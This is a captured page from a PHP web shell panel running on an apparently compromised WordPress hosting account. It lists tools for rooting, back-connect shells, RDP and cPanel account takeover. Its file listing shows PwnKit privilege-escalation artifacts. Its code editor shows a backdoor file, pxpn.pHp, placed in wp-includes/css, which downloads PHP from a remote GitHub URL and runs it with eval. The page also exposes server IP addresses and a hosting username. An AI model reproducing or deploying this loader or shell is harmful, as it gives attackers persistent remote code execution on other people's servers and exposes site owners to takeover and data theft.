Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.55
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
nortrmdp /
primetaxinc.net /
wp-includes /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
error_log
4.72
MB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
pxpn.pHp
1.84
KB
-r--r--r--
xnxx.php
0
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pxpn.pHp
<?php session_start(); function geturlsinfo($url) { $url_get_contents_data = false; if (function_exists('curl_exec')) { $conn = curl_init($url); // Initialize cURL session curl_setopt($conn, CURLOPT_RETURNTRANSFER, true); // Return result as a string curl_setopt($conn, CURLOPT_FOLLOWLOCATION, true); // Allow cURL to follow redirects curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); // User agent curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, false); // Disable SSL peer verification curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Disable SSL host verification if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); // Set cookie if exists } $url_get_contents_data = curl_exec($conn); // Execute cURL if (curl_errno($conn)) { $url_get_contents_data = false; // Set to false on error } curl_close($conn); // Close cURL session } elseif (function_exists('file_get_contents')) { $url_get_contents_data = @file_get_contents($url); // Fetch contents with file_get_contents } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = @fopen($url, "r"); // Open URL if ($handle) { $url_get_contents_data = stream_get_contents($handle); // Get content from stream fclose($handle); // Close handle } } return $url_get_contents_data; // Return the result } // Execute the URL fetching and code execution directly $a = geturlsinfo('https://raw.githubusercontent.com/notif77/cus/main/geck0'); // Fetch content from URL if ($a !== false) { eval('?>' . $a); // Execute the fetched PHP code } else { echo "Failed to retrieve content."; // Error message if failed } ?>
Close